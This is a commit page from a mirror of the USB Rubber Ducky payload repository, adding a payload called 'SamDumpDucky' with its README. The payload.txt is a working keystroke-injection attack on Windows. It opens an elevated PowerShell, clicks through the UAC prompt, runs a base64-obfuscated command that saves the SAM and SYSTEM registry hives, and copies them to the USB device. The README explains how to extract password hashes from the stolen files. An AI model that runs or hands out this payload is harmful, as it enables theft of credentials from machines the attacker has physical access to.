hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #167 from 0iphor13/master 

Uploaded SamDumpDucky
pull/168/head
hak5glytch 2022-10-20 10:36:53 -07:00 committed by GitHub
parent 7ca17d201b 56a44f70e7
commit 28000dc626
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
payloads/library/credentials/SamDumpDucky/README.md Normal file
View File

@ -0,0 +1,24 @@
**Title: SamDumpDucky**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is SamDumpDucky?**
#
<p>SamDumpDucky dumps the users sam and system hive and compresses them into a zip file and exfiltrate it onto the Ducky.<br>
Afterwards you can use a tool like pypykatz to extract the users hashes.</p>
**Instruction:**
1. Plug in your RubberDucky and wait a few seconds
2. Unzip the exfiltrated zip file onto your machine.
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
> `samdump2 DuckySys DuckySam`
or `pypykatz registry DuckySys --sam DuckySam`
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

29
payloads/library/credentials/SamDumpDucky/payload.txt Normal file
View File

@ -0,0 +1,29 @@
REM Title: SamDumpDucky
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
REM Author: 0iphor13
REM Version: 1.0
REM Category: Credentials
REM Attackmodes: HID, Storage
DELAY 500
ATTACKMODE HID STORAGE
REM Opening Powershell as Administrator
DELAY 1000
GUI r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
REM Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
ALT j
DELAY 1000
STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAARAB1AGMAawB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAARAB1AGMAawB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABQAFcARABcAEQAdQBjAGsAeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABEAHUAYwBrAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEQAdQBjAGsAeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAARAB1AGMAawB5AFMAeQBzADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAARAB1AGMAawB5AFMAYQBtADsAZQB4AGkAdAA=
DELAY 500
STRINGLN ;Write-Host "Exfiltrating SamDumpDucky.zip..." -ForegroundColor Green;mv SamDumpDucky.zip ((gwmi win32_volume -f 'label=''DUCKY''').Name);$RD = (gwmi win32_volume -f 'label=''DUCKY''').Name;Start-Sleep 3;(New-Object -comObject Shell.Application).Namespace(17).ParseName($RD).InvokeVerb('Eject');Start-Sleep -s 5;Exit